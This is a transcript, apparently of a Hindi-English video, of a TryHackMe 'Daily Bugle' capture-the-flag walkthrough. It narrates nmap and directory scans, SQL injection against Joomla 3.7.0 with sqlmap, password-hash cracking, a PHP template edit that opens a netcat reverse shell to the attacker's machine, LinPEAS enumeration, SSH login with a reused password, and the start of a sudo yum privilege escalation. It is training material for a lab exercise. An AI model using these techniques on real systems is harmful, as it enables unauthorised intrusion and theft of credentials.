मेरे चैनल के ऊपर हैकिंग वीडियोस काफ़ी पॉपुलर हैं कंपेयर टू अदर्स। सो इसलिए मैंने सोचा कि कुछ और हैकिंग वीडियोस बनाई जाए। तो इसलिए I'll be doing some rooms from Try Hack Me, and today I'll be doing the daily Bugle room। और इसकी डिफ़िकल्टी जो है वो हार्ड लिस्ट हुई है यहाँ पे, but it's actually not that hard। You'll see when I will do the challenges here। So first step, let's start the machine here। और जैसे ही machine start होगी, it's gonna take a little bit time here। Then we'll start scanning the machine, and we'll probably have to give it some time before we'll be able to do it। So in the meantime, let's do other things। For example, we can open this Open VPN here, and now we can interact with this machine using this Open VPN profile here। इसके अलावा जो है, I normally use my Mac for everything pretty much। लेकिन ये कि कुछ ऐसे टूल्स होते हैं जो कि काली लिनक्स पे अवेलेबल होते हैं पर मैक पे अवेलेबल नहीं होते हैं। तो उस उन तमाम टूल्स के लिए आई यूज़ काली लिनक्स। सो मेरे पास एक रास्पबेरी पाई है, एंड आई हैव इंस्टॉल्ड Kali Linux on it, and then I simply SSH into it। So let's SSH into the Kali machine here। So this is my Kali machine now, and ये जो दो टैब्स आपको नज़र आ रहे हैं, ये जो है, let me just also highlight this as red so I know that this is the Kali Linux tab। So let's see कि machine जो है वो available हुई है कि नहीं। So now we have the IP address। तो first let's copy the IP address here। इसके अलावा जो है, मैं जैसे यही मशीन करता हूँ, तो I normally make notes as well। So let's also ready the text editor here। Okay, so now we have the text editor। We have pretty much everything we want to start। तो लेट्स सी के क्या इस पे वेबसाइट अवेलेबल है कि नहीं। छोटा सा बैकग्राउंड ये है कि इसके चैलेंज के जो डिस्क्रिप्शन है उसमें उन्होंने लिखा हुआ है कि दिस इज़ अ Joomla CMS वेबसाइट, एंड वी विल बी अटेम्प्टिंग SQL injection on it, and then we'll be cracking some hashes as well, and after that we'll be using yum utility to escalate our privileges। काफ़ी वेरिड टास्क इसमें प्रैक्टिस करने को मिल जाते हैं। सो आई थिंक इट्स अ गुड मशीन टू प्रैक्टिस योर हैकिंग स्किल्स ऑन। तो लेट्स सी के वो जो वेबसाइट है, इज दैट अवेलेबल और नॉट। तो जैसे ये मशीन अवेलेबल हो जाएगी, we'll start the nmap scan, and then we'll also do the directory, और उसके ferox buster के ज़रिए we'll try to find all the related routes to the website as well। इसके अलावा let me also explain one more thing here कि अगर आप GitHub पे जाके सर्च करें sec lists, SECLISTS, and then you search it on GitHub, then you get this repo। इस repo के अंदर काफ़ी सारे आपको word list जो हैं आपकी ज़रूरत की मिल जाती हैं। So I have cloned this repo locally on my Mac, and I will be using this with Ferox Buster, and then later on in the process, when we'll be cracking the hash, we'll use the same list here with the John the Ripper। And on my local machine, I have it here। So that is CD and the word list folder, then sec lists। So here we have all the word list available here। So first, let's do the nmap scan here। So
So we'll do sudo nmap-ss-sv -a-vv, and then the IP address here, and then we'll just feed the output to nmap scan. And let's split the window here. And in the second part here, we'll be running the Ferox Buster. So let's first switch to the directory. And here we'll be running Ferox Buster and -u. And then here we'll just copy the link from here. And then we also have to specify the word list. Or word list, जैसा कि I have already discussed, कि we'll be using this word list here, the sec list. So here that will be and set list and discovery web content common.txt. And this one will start the scan here. Okay, so I think now we have everything set up for now. And let's see what's the first question. So the first question is access the web server. Who robbed the bank? Okay. So we have accessed the web server, and it looks like Spider-Man has robbed the bank. So that's what we'll write here, Spider-Man. Okay, so that answer is correct. So now the real part starts, because task one was just a goofy task, and now the real fun begins here. So now it is asking us to find the version of the Joomla CMS. तो इसके लिए वैसे तो Joomla का एक route भी available है, so we can use that, and this Ferox Buster scan will actually provide us with the route as well. लेकिन ये कि I'll show you an easier way to do it. तो Metasploit के पास एक मॉड्यूल है जो कि Joomla का वर्जन स्कैन करके आपको बता देता है. So let's run Metasploit here first. So we'll do msf console. So let's clear the screen and search for Joomla. अब ये चूंकि इसका font काफ़ी बड़ा है तो we have some lines wrapped, but we'll reduce the font a bit, and now we can see कि ये जो number 13 आपको नज़र आ रहा है, auxiliary scanner HTTP Joomla version. So this is what we'll use. So we'll do use 13. And let's clear the screen again so you guys see everything here. So we'll do show options. Or it may looks like we just have to do the R host and everything else is there already. So we'll do set R host. And here we'll just put in the IP address. And let's do this one. And let's run it now. So now ये हमें बता रहा है कि जो Joomla का वर्जन है that's 3.7.0. So that's what we'll write here, 3.7.0, and click on the submit button. So दो क्वेश्चन हो गए. अब नेक्स्ट क्वेश्चन में ये आपसे पूछ रहा है कि जोना का क्रैक्ट पासवर्ड चाहिए इसको. तो लेट्स सी के जोना का पासवर्ड कैसे निकाला जा सकता है. तो लेट्स फर्स्ट सी के फेरॉक्स बस्टर ने कोई एडमिनिस्ट्रेटर का लिंक निकाला है अभी तक. तो सामने ही हमें ये एडमिनिस्ट्रेटर का लिंक नज़र आ रहा है. सो वील कॉपी दिस लिंक हियर एंड देन वील लोड इट इन अ सेपरेट टैब. तो अब ये कि यहाँ पे एडमिनिस्ट्रेटर का लिंक जो है वो अवेलेबल है. सो मेरे ख्याल से या तो इसके साथ कोई हमें एसक्यूएल इंजेक्शन करनी पड़ेगी, या फिर इसके पास भी यहाँ पे भी एक लॉगिन फॉर्म अवेलेबल है, तो शायद यहाँ पे एसक्यूएल इंजेक्शन करनी पड़ेगी. But before we start doing the SQL injection,
let's see what vulnerabilities Joomla version 3.7.0 have. So let's exit the MSF console, and that will use Searchsploit. So we'll do Searchsploit Joomla 3.7.0, और यहाँ पे it has found that there is an exploit available. So let's first change the directory, because I will be copying this file to the daily bugle directory. And now I will do searchsploit -m. अब -m के बाद अगर मैं ये वाला path enter करूँगा तो searchsploit will copy this file to the current directory I am in. So let's copy this, paste this here, press enter. तो अब ये फाइल जो है मेरे पास यहाँ पे अवेलेबल हो जाएगी. So let's clear the screen and let's get this file out. So we have a vulnerability for Joomla 3.7.0 और ये इसका CVE number है, and then it is not explaining anything in particular, पर ये किसने हमें यहाँ पे ये एक SQL map की जो कमांड है वो लिख के दे दी है. And I guess we can use the same command. So we'll copy this and let's go to our text editor and save this command here. Because we'll be editing it, क्योंकि यहाँ पे ये जो इसका एड्रेस है ये लोकल होस्ट के तौर पे यहाँ पे इस्तेमाल हुआ हुआ है, but we have a different IP address, so we are going to change this here. So let's actually do this. So here, तो अब इस कमांड के साथ जो कि सामने सामने चीज़ें नज़र आ रही हैं, क्योंकि मैं ZSH यूज़ करता हूँ और इसके अंदर काफ़ी सारे करैक्टर ऐसे हैं जो कि ZSH को अच्छे नहीं लगेंगे. सो आई विल हैव टू स्केप देम अ बिट डिफरेंटली. बट ये कि अगर आप बैश इस्तेमाल कर रहे हैं तो you can just copy paste this command. I cannot, so I'm gonna adjust it to my shell. लेकिन अगर if you guys are using bash, you can just simply use this command as it is. So let's clear the screen here and we'll do SQL map -u. अब जो ZSH है, it actually auto escape as you type. So if I'll paste this URL from this to my terminal here, ZSH will automatically escape everything for me. So I do not have to do it. So that's why I am just simply pasting this URL. And now you can see कि इसने यहाँ पे ये सारे slashes डाल के जो भी character ZSH के साथ compatible नहीं थे उसने उसको escape कर दिया automatically for me. So that's a good thing, but it can get confusing sometimes. And then we'll copy this part here now and paste this as well. And in the next part, अब मैंने अपने चैनल पे SQL injection की एक वीडियो पहले से बनाई हुई है, and you guys can watch it. I'll put the link in the right top corner, तो वहाँ से आप उसको देख सकते हैं. तो यहाँ पे हम simply SQL map से सिर्फ databases list कर रहे हैं. It's a multiple step process जिसमें कि सबसे पहले आप database list करते हैं and then you list the tables and then eventually you dump the table. So 3 steps के अंदर हम काम करेंगे. The first step would be to list the databases and that's what I'll be doing here. So -dbs. अब ये जो आखिरी वाली कमांड है ये थोड़ी सी अलग तरीके से मुझे डालनी पड़ेगी, but if you are in bash it doesn't really matter. So here I have to put this in double quotation marks. And I think I'm all set now. So let's execute the command. Now it is asking के जो भी वो server है, it wants to use its own cookie because we haven't supplied any. So I will say okay, accept the cookie. I'll type Y and press enter. And then it is saying
इसको जो डेटाबेस मिली है दैट इज माई एसक्यूएल, and do I want to scan for other databases? And I would say no. I'm happy with MySQL so far. अब ये यहाँ पे काफी लंबे टेस्ट करेगा, and it might take like 15-20 minutes depending upon network speed. It might take maybe 30 minutes or so. ये सिंपली इस टाइम ये चेक करने की कोशिश कर रहा है कि इज दिस वेबसाइट जो कि आपको यहाँ नजर आ रही है, इज दिस वेबसाइट वुलनरेबल टू एसक्यूएल इंजेक्शन और नॉट. अब हमें तो पता है कि है, पर एसक्यूएल मैप डज नॉट नो दैट. So it's going to run all the tests it has in its database on this website. और फिर ये जो भी इंजेक्शन यहाँ पे रन होगी, दिस इज अ ब्लाइंड रिफ्लेक्टिव इंजेक्शन. तो इस तरह के इंजेक्शन के टेस्ट जो होते हैं ये थोड़े से ज़्यादा टाइम कंज्यूमिंग होते हैं, तो इसलिए इट्स गोना टेक long time to finish up. So I'm gonna pause the video here, and once it has come to some reasonable step where I have to explain something, I will start the video again. तो अभी तकरीबन 15 मिनट, आई गेस 15-20 मिनट्स इसने लिए हैं, एंड सो फार एसक्यूएल मैप वाज एबल टू फाइंड के ये जो पैरामीटर हमने इसको कमांड के अंदर दिया था, लिस्ट फुल ऑर्डरिंग, ये इंजेक्टेबल है. और इसके अलावा जो इसने सेकंड इंफॉर्मेशन मालूम की है कि वो इसका माई एसक्यूएल का वर्जन 5.0.12 जो है इस्तेमाल हो रहा है सर्वर के ऊपर. एंड नाउ इट इज़ ट्राइंग टू फाइंड आउट के कितने कॉलम्स की क्वेरी इसको करनी पड़ेगी विद द यूनियन क्वेरी, क्योंकि जब भी हम यूनियन सेलेक्ट करते हैं तो उसके अंदर वी हैव टू डू द एग्जैक्ट नंबर ऑफ कॉलम्स जो कि ओरिजिनल क्वेरी के अंदर होते हैं. तो सिंस वी डू नॉट नो दैट, तो इट इज़ ट्राइंग टू फाइंड दैट आउट. अब ये कि ये यहाँ पे आप देख सकते हैं कि ये 1 to 20 कॉलम्स किया इसने, then it is doing 21 to 40, 41 to 60. It will go all the way up to 100, and then it will find out कि कितने columns इसको required होंगे, and then it will start doing the actual SQL injection attack. So I'm gonna pause again now, and once it gets to some other meaningful step, I will restart the video and explain it. अब तक की प्रोग्रेस के अंदर यहाँ पे it is now sure, SQL map is now sure that this parameter is vulnerable to SQL injection, and now it is asking me if I want to test for other parameters, and it's definitely no, I do not want to test. So I will type n in here and press enter. अब यहाँ पे इसको जो है ये पेलोड इसने यहाँ पे लिस्ट किया है हमारे लिए, and now it is fetching database names from the information schema. अब ये जो आपको इधर critical warning नज़र आ रही है, this happens when you are using the open VPN sometimes. तो try hack me के सर्वर पे अगर रश ज़्यादा होता है तो sometimes the VPN response is slow, तो इस तरह की critical warnings आ जाती हैं नज़र. But SQL map जो है it easily recovers from it, so don't have to worry about it that much. तो अब यहाँ पे इसको जो है इंफॉर्मेशन स्कीमा जो इसने क्वेरी की थी, it has been able to find all the databases that are on that server's MySQL installation. तो I think कि Joomla वाली जो database है, this is what we'll be interested in. So we'll bring back that previous command here, and now we are going to change it. So in this case, now we know the name of the database. So we'll change this dash DBS to dash capital D, and then we'll write the name of the database here. और इस दफ़ा
we want it to find the tables for us. So that's what we'll do by typing this dash dash tables. Everything else remains the same. और अब जो step होंगे, they'll be very quick because can now MySQL or basically ये जो SQL map है, it exactly knows how to do this SQL injection attack. तो अब जो भी हम command type करेंगे, the results will be very fast compared to whatever it was before. So let's execute this command here. अब ये दोबारा से वही कुकीज़ वाला क्वेश्चन पूछ रहा है, तो ओके, स्टोर द कुकीज़, दैट्स फाइन. ये काफ़ी सारे टेबल्स जो हैं इसको मिल गए हैं. तो विल बी मोस्टली इंटरेस्टेड इन द यूजर्स टेबल. सो लेट्स सी कि इसको यूजर्स टेबल मिलता है कि नहीं. सो यहाँ पे इसने हमें जो है समरी दे दी है टेबल्स की. तो नाउ इट हैज़ दिस यूजर्स टेबल. सो विल कॉपी द नेम ऑफ द यूजर्स टेबल, get the previous command back, and now we do not want it to list the tables, we want it to dump the table for us. So we'll type dash capital T, type paste the name of the table here, and then as command we'll do dash dash dump. So this way we are asking SQL map to dump the users table for us. So let's execute this command now. तो मेरे ख्याल से ये दोबारा से इसको कोई मसला है उसके नाम के साथ. तो we'll put that in double quotation and let's try it again. Cookies दोबारा से पूछ रहा है. Yes, store the cookies. And do you want to use column existence check? Unable to. अब इसको जो है कॉलम के नाम जो हैं वो यूजर्स टेबल में नहीं मिल रहे हैं. तो इस सूरत में वी विल गैस, बेसिकली एसक्यूएल मैप जो है गैस करेगा मुख्तलिफ कॉलम के जो नाम होते हैं. तो we'll basically do y in here and press enter, and now it will ask कि आप कौन सी word list use करना चाहते हैं. तो default word list जो कि SQL map के साथ आती है, that is good enough. So we'll do number 1 in here and press enter. अब ये पूछ रहा है कि आपको कितनी threads जो हैं वो इस्तेमाल करनी है. There are about 2500 entries in this word list here. So we'll use let's say 5 threads. That's I guess good enough. अब ये कि ये काफ़ी सारे यहाँ पे entries हैं and it's going to be a bit slow. So even if I'm using 5 threads, it is still using slow. मैं ज़्यादा threads इसलिए इस्तेमाल नहीं करना चाह रहा था कि it might just rush the server, और server पे अगर कोई let's say कि कोई IDS system है या कोई firewall type की चीज़ है या कोई web application firewall है, तो that might just block SQL map. So that's why I have kept it to 5, but it's still slow. So I'm going to pause the video, and once it has gone through most of the word list here, I will restart the video again. तो अभी तक ये जो है it has taken about 34 minutes so far, और ये उस वर्ड लिस्ट से टेबल के कॉलम नेम सर्च कर रहा है, और इसको जो है अभी 98% तक हो गया. So I have restarted the video so you guys can see the final attack happening in real time here. Now it has attempted the final attack in here, और ये जोना का जो यूज़र था उसका record जो है यहाँ पे इसने dump कर दिया, and this is the hashed password.
So let's go to the try hack me room page and see what's the question now. So we'll copy this hash value and paste it here. तो अब ये जो है जोना का क्रैक्ड पासवर्ड जो है हमसे मांग रहा है, बट वी हैव द हैश। तो वैसे तो आप जॉन द रिपर इस्तेमाल कर सकते हैं इसको क्रैक करने के लिए। अब वीडियो जो है वो काफ़ी लंबी हो गई है, सो दैट्स व्हाई आई एम नॉट यूजिंग जॉन द रिपर। तो उसके लिए हमारे पास एक अल्टरनेटिव है। ये एक वेबसाइट है, इसका नाम है hashes.com, और ये जो है हैश की टाइप जो है आइडेंटिफाई करके हमें बताती है। तो वैसे भी अगर आपने जॉन द रिपर यूज़ करना होता है तो यू हैव टू specify what kind of hash you are trying to crack. So we'll have to use some website or some other utility to find the type of the hash. So we'll just do it on this website. और ये वेबसाइट जो है इसकी हैश की टाइप भी हमें बता देती है, और अगर इसका कोई क्रैक पासवर्ड इसकी डेटाबेस के अंदर हो तो ये वो भी प्रोवाइड कर देती है. सो we'll copy paste the hash here and let's click on the submit and identify button here. एंड यहाँ पे इसने हमें बता दिया कि ये जो हैश की टाइप थी दैट इज़ बीक्रिप्ट, और ये जो इसका पासवर्ड था वो है spiderman123. So let's copy the password here, go to the try hack me room and let's paste the password here and click on the submit button. और ये वाला जो है पासवर्ड जो है इसका सही हो गया. So now we have the username and the password to log in. So let's go back to our terminal and get the username as well. So this is the username. तो अब चूंकि यहाँ पे आप टर्मिनल में देख सकते हैं कि it is listing this as super user, so most probably this is the admin user. So we'll try to log into the admin portal now, जो कि हमने फ्रीडॉक्स बस्टर के ज़रिए उसका लिंक हमने मालूम किया था. तो लेट्स जूम इन हियर अ लिटिल बिट. लेकिन इससे पहले कि वी लॉग इन, अब यहाँ पे खाली 27 मिनट्स रह गए हैं. सो आई एम गोइंग टू ऐड 1 आवर हियर, ताकि ये जो है मशीन जो है एक्सपायर ना हो जाए. तो लेट्स गो बैक टू आवर admin portal here. Let's put in the username Jonah and Spiderman123, and let's try to log in. So that password that we cracked, it worked for the admin user. तो अब ये हमारे पास जो है हमें इस Joomla CMS का एडमिन लॉगिन मिल गया. तो अब नेक्स्ट स्टेप जो है वो हमसे पूछ रहा है कि यूज़र का फ्लैग जो है हमने मालूम करना है. तो लेट्स ट्राई टू लॉग इन टू दिस VM हियर फर्स्ट. तो उसके लिए हम जो है कोई रिमोट कोड एग्जीक्यूशन इस्तेमाल करेंगे, ताकि हम इस CMS के साथ कुछ ऐसा कर सकें कि हम इसके अंदर लॉग इन कर सकें थ्रू सम RCE. So let's ask hack tricks. So we'll do hack tricks Joomla, और ये लिंक हमारे पास आ गया. और अगर आप इसके बिल्कुल बॉटम में जाके देखेंगे तो ये आपको RCE का तरीका बता रहा है. तो सिंस आई ऑलरेडी नो दिस, आई विल शो इट टू यू गाइस. तो यहाँ से ये आप कंट्रोल पैनल में जाएंगे एंड देन यू विल गो टू टेम्पलेट्स. टेम्पलेट सेलेक्ट करना पड़ेगा लिस्ट में, एंड देन यू विल सेलेक्ट दिस प्रोटोस्टार. अब ये आपके पास टेम्पलेट की फाइल्स आ गई हैं. फ्रॉम हियर यू विल सेलेक्ट दिस error.php फाइल and it will load it in the code editor here. और इसके जो फर्स्ट लाइन है यहाँ पे आप जो हैं ये जो इसने हमें कोड स्निपेट छोटी सी दी हुई है, जस्ट अ सिस्टम फंक्शन कॉल इन PHP. तो विल कॉपी दिस and then we will paste this here. अब चूंकि हमें पता है कि ये कमांड एग्जीक्यूट कर देगा, तो लेट्स फर्स्ट डू द netcat listener here. So we'll do netcat
-lvp and we'll listen on port 9999. So let's put a listener here. और अब चूंकि हमने वहाँ पे रिवर्स शेल एग्जीक्यूट करना है तो we'll get the reverse shell from this website refshells.com. तो यहाँ से we'll get this nc make FIFO and this is my IP address and here I will put in the port number. So I will copy this reverse shell one-liner and then I'll go to the template page. अब यहाँ पे ये जहाँ पे इसने ये get cmd लिखा हुआ है तो I would not do that. I will simply just paste that reverse shell in there and then I will save this file, save and close, and then also close this template as well. अब next step के अंदर we have to visit this special link in here. So अब चूंकि हमने उसमें कोई command parameter जो है add नहीं किया तो we'll just keep it to .php and ignore the rest. So we'll copy this link and in a new tab we'll paste the link here and then press enter. एंड लेट्स सी के टर्मिनल पे कोई कॉल आई है कि नहीं आई है. तो जैसे ही वो कोड एग्जीक्यूट होगा it will have a reverse shell here. अब यहाँ से दो HTTP हो गए हैं. I am acting really stupid right now. Let me just copy this again, go to this tab here, paste it and press enter. So this time the reverse shell is successful. So now I am logged into the website or the server actually. So let's अब ये जो है चूंकि नेटकैट का रिवर्स शेल है I cannot clear the screen at the moment. So that's how we'll have to work. So we can actually let's just exit the shell, clear the screen, start the listener again, and then we'll just refresh this web page and it will get me the link again. So now अब ये कि हमारे पास थोड़ा सा रूम मिल जाएगा हमें. So let's see कि ये यूज़र कौन सा है. So it is saying who am I and ये जो है Apache यूज़र है. तो Apache यूज़र जो है वो किसी खास काम के हमारे नहीं आएगा. We need to know कि what other users we have क्योंकि हमें यूज़र फ्लैग चाहिए और definitely it's not Apache user flag. So let's see कि we can access the etc password file. So we'll do cat etc passwd और यहाँ पे हमें जो एक यूज़र नज़र आ रहा है वो है ये J Jameson. So most probably this is the Jonah Jameson user. So इसका flag हमें चाहिए. So what we'll do is for now we'll copy this the contents of this password file and we'll just keep it in case if we need it later. So अभी तक हमें यहाँ तक समझ में आ गई है. अब हम जो नेक्स्ट स्टेप है वो ये कि लेट्स सी के वी कैन गो इनटू दिस यूजर्स होम डायरेक्टरी. सो वी विल कॉपी द यूजर नेम हियर and let's try to cd into /home/ this user here, or
that means के permission denied है, तो I cannot actually log in as this user. So we'll have to do some sort of privilege escalation here. So privilege escalation के लिए the most popular way to check for privilege escalation on Linux is Linpeas. So I will do Linpeas GitHub search, and then I will download Linpeas on my local computer. And once I have it on my local computer, then I will upload it to that web server. So let's copy this link here and go back to our terminal. इस पे तो रिवर्स शेल चल रहा है. पहले वाले टर्मिनल पे हमारे पास जो nmap का एरिया था, let's clear that and let's get the file here. And we'll also have to go to the daily bugle room here, and we'll wget that linpeas file here. So अब यहाँ पे linpeas आ गई है हमारे पास. So let's check that. So we have the linpeas file here. अब यहाँ पे हम पाइथन का सर्वर रन करेंगे ताकि ये फाइल हम अपलोड कर सकें. So we'll do python 3. Let's clear the screen first and increase the font just a bit. So we'll do python 3-m http.server, और अब ये जो है पोर्ट 8000 के ऊपर ये जो है फाइल जो है हम डाउनलोड कर सकते हैं on our server. So let's go to the reverse shell now and let's get this file. So first I will go to this temp directory here, and now I can do wget http :10.9.40.41. अब ये मेरी IP है, and the reason I know कि this is my IP कि ये जो ओपन VPN का सॉफ्टवेयर है, इसके अंदर अगर आप बिल्कुल बॉटम में जाके देखेंगे तो यहाँ पे ये लिखा हुआ आपको दिखा देता है कि your private IP, and in this case this is 10.9.40.41. And then I'll do port 8000 and do the linpeas file. अब ये कि सर्वर पे हमारे पास linpeas आ गया है, and that's fine. So let's list the contents of this temp directory here. अब यहाँ पे हमें दिखा रहा है कि linpeas.sh. So let's make it executable now. So we'll do chmod +x and then name the file linpeas.sh. अब यहाँ पे we'll run this linpeas file now. So let's do ./linpeas.sh. अब ये थोड़ा सा टाइम लेता है रन होते हुए, so that's fine. I will pause the video and let it run, and once it is done doing its thing, I will restart the video. linpeas जो है काफ़ी देर से इस जगह पे स्टक हो गया, so we'll ignore any further output and let's start from the top and see whatever we have. So let's move all the way to the start of linpeas. अब ये कि यहाँ पे जो मेरे टर्मिनल का बफर है that is 20,000 lines. नॉर्मली जो है 5 to 10,000 लाइन्स का बफर होता है टर्मिनल्स पे, तो समटाइम्स linpeas की जो आउटपुट है इट कैन ईजिली एक्सीड द बफर, सो आपका जो टाइम होता है वो वेस्ट हो जाता है बिकॉज देन you will miss some of the data. Firstly, I would recommend to increase the buffer size before running linpeas especially. So let's go to the very top of linpeas command. अब यहाँ से linpeas जो है start हुआ है, और यहाँ पे we have a little key in here. I already know कि ये जो red text और yellow background है that's a 95% privilege escalation vector, और अगर कोई चीज़ red के अंदर है तो you should take a look at it. So let's see. यहाँ पे हमारे पास
लिनक्स का जो ये हमें कर्नल का वर्जन बता रहा है दैट इज़ 3.10.0, तो दैट्स फाइन। sudo का थोड़ा सा ओल्डर वर्जन यहाँ पे इस्तेमाल हो रहा है, तो दैट कैन also be one of the privilege escalation vectors. देन यहाँ पे इसने कुछ CVEs लिस्ट किए हुए हैं जो कि हम चेक कर सकते हैं. Then we'll scroll down more and let's see what else we have. We have some more CVEs here. What else? सबसे पहले आमतौर पे मैं कोई जब भी लिनपीस रन करता हूँ तो आई लाइक टू सी कि मेरे पास सूडो प्रिविलेजेस कौन कौन सी हैं. तो ये हमारे पास इधर लिस्ट कर देता है. विल शो मी समवेयर डाउन द लाइन, बट ये क्या अभी तक कोई सिग्निफिकेंट चीज़ हमें मिली नहीं है. ये इसने यहाँ पे PS की आउटपुट दी हुई है हमें. दैट कैन बी हेल्पफुल इन सम एडवांस केसेस, बट आई एम श्योर कि इस VM में इसका कोई खास काम नहीं होगा, तो वी आर गोइंग टू इग्नोर दिस. अब ये कुछ प्रोसेसेस हैं जो कि रूट यूज़र जिसका जो पेरेंट प्रोसेस आईडी है वो रूट के तौर पे रन कर रहा है, तो दैट कैन बी समवट हेल्पफुल मे बी, बट लेट्स सी व्हाट एल्स इज देयर. ये सारी एक्टिव पोर्ट्स हैं इसके पास. तो एन मैप ने हमारे पास 25 पोर्ट लिस्ट नहीं की थी, एंड इट इज़ शोइंग मी के इट इज़ ऑल्सो लिस्टिंग ऑन पोर्ट 25. तो इफ़ एवरीथिंग एल्स फेल्स we'll also see के पोर्ट 25 पे क्या रन कर रहा है, बट फॉर नाउ we'll keep looking for more information. अब यहाँ पे इसने ये 2 यूज़र भी लिस्ट कर दिए हैं हमारे लिए, बट वी ऑलरेडी नो दैट. यहाँ पे इसने ये PHPNI का कुछ कॉन्फ़िगरेशन जो कि थोड़ी सी गलत हो सकती है वो लिस्ट की हुई है हमारे लिए. एंड देन वी हैव दिस VNC सर्वर हियर एज वेल. अब ये पता नहीं रन हो रहा है, मेरे ख्याल से ये पोर्ट 25 पे शायद VNC ही रन हो रहा हो, आई डोंट नो. Now we have some mail accounts here as well. ये हमारे पास डेटाबेस का पासवर्ड यहाँ लिस्ट कर रहा है. So we have this password that's being used to log into our database. So let's copy this password here and let's go to our text editor and let's say okay, MySQL DB password. अब चूंकि इसी सर्वर की जो है पोर्ट 22 भी ओपन है, तो we'll try to SSH. So let's stop this Python server here and we'll use this password, and the user that we are interested in is the J Jameson user. So we'll do SSH J Jameson at, and then we'll get the IP address here, and let's see कि ये पासवर्ड जो है SSH पे काम करता है कि नहीं. नॉर्मली जो है यूज़र्स जो हैं अपने पासवर्ड जो हैं वो रिपीट करते हैं एक जगह से दूसरी जगह. तो लेट्स सी कि ये चलता है कि नहीं.
before we try any other exploits. So we'll type this command on the terminal, enter. You will type yes to accept the server, and now it is asking for password. So we'll copy this password, paste it here. So now we are logged in as J Jameson. So let's check that. Who am I? And it is showing me that this is J Jameson. So far so good. अब ये कि यहाँ पे let's see के user flag क्या है. So we'll go to this user's home directory and then we'll do J Jameson and let's see कि इसके directory में अंदर क्या है. So we have this user.txt file. So we'll cat this out here, user.txt, and then we'll copy the code and put it here. Machine expire nahi hui hai. Let me refresh the page and see what's in there. The machine expire nahi hui hai abhi. Okay, so I'm going to paste the user flag in here and click on the submit button. So we have one last question left in this task, और हमें अब जो है root user बनना है. So we'll repeat the same process again, but this time अब ये जो Apache user का reverse shell था, ये अब हमारे किसी काम का नहीं है, because we already have another SSH here with a higher privileged user. So we'll disconnect this shell, and now for the J Jameson user, we'll also do the Linpeas enumeration again. So let's on this terminal here, let me host the Python server with the Linpeas file here. So let me do python 3-m http.server, और अब ये जो है it is listening on port 8000. So on this J Jameson SSH, let me close this Prox buster thing here so we have more space. So let's go to the temp directory, or let's see कि कोई पुरानी Linpeas की file यहाँ पे है. It's not in there anymore, so okay, we'll get it again. So we'll do wget http://10.9.40.41 :8000/linpeas.sh. तो अब इसने Linpeas की फाइल जो है डाउनलोड कर ली है. So let's check that, and it has the Linpeas file here. So let's make this executable, chmod +x, and then we'll do Linpeas. अब चूंकि ये SSH का शेल है तो ऑटो कंप्लीट जो है आपको मिलेगा यहाँ पे, एंड यू कैन ऑल्सो यूज द अप डाउन कीज. जबकि नेटकैट का शेल होता है वो काफ़ी अनस्टेबल होता है, तो उसके अंदर जो है आपको आप स्क्रीन भी क्लियर नहीं कर सकते और आप अप डाउन कीज से अपनी कमांड भी जो है वापस नहीं ला सकते. So this is a much better shell, and now this is executable. So here let's run Linpeas. ये वाला Linpeas का जो सेशन था, it ran pretty quickly. तो इसमें अगर हम अपने रूम की डिस्क्रिप्शन में भी पढ़ें तो it has already given us a clue in here कि अगर हमने privilege escalation करनी है तो we'll be looking for something called yum. Yum is a package manager for CentOS. So in this Linpeas output, we'll be searching for
any SQID binaries here, and let's see कि वहाँ पे हमारे पास जो है jump जो है list हो रहा है कि नहीं. So let's start scrolling up. अब ये SGID की तो एंट्रीज हैं और ये SUID की एंट्रीज हैं. तो यहाँ पे हमारे पास do we have the yum listing here or not? Well, यहाँ पे ये नहीं दिखा रहा है. So maybe it is listing at someplace else. लेकिन इसके अलावा इसका एक और बड़ा अच्छा तरीका है. We can just simply do sudo -l और इस तरीके से भी वो हमको बता देता है कि कौन सी ऐसी बाइनरीज हैं that we can run as a sudo user. So here in this case you can see this user bin yum जो है is a binary that I can run as a sudo user. So now we have the name of the binary. So let's do the exploit now. तो अगर आप इस क्वेश्चन के हिंट में जाके देखें तो it is showing you this website in here. अब ये वेबसाइट जो है it just give you the way that you can exploit these kind of binaries to get a root shell. So let's visit this website and search for yum. Now we have one entry for yum in here, or up chunke we are interested in sudo privileges here, so that's what we'll do. अब यहाँ पे ये एक छोटा सा तरीका आपको बता रहा है कि you have to create a RPM package और उस RPM पैकेज के अंदर हम ये जो आप ये सेकंड स्टेटमेंट देख रहे हैं echo की, तो we are just putting some command in here और जब ये उस executable या उस basically ये हम उसका पैकेज बनाते हैं यहाँ पे RPM का, और फिर जब हम उसको रन करेंगे अपने सर्वर के ऊपर तो ये जो कमांड जो है ये रन हो जाएगी एज अ रूट यूजर. सो लेट्स क्रिएट द RPM पैकेज नाउ. तो अब ये मैक के ऊपर RPM पैकेज नहीं बन सकता, so that's why I will do it on my Kali machine here. तो अब ये जो हमें पैकेज रेकमेंड कर रहा है दैट इज दिस FPM पैकेज जिसके ज़रिए कि आप ये RPM पैकेज बना सकते हैं. तो लेट्स विजिट द वेबसाइट हियर. अब यहाँ पे आपके पास इंस्टॉलेशन गाइड मौजूद है, so you can click on this one and it is asking us to use gem. Gem is a package manager for Ruby. So it comes pre-installed on Kali Linux, so you don't have to install gem, but you can use this command and you have to use this command with sudo. So you can do sudo gem install fpm, sudo gem install fpm, and this will install the fpm package for you. Since I already have it installed, I'm not going to run this command. लेकिन ये पैकेज जो है खाली आपको RPM पैकेज नहीं बना के देगा, तो you need another package and that is, let me show you, sudo apt info RPM. तो ये जो RPM पैकेज है you also have to install in addition to that FPM package. So once you have these packages, we can use these two packages to create the binary for us. So let's follow the instructions from the GTFO bins website. So okay, so we'll copy the first command here and let's create another directory. So let's paste the first command in here. And now we'll do the second command.
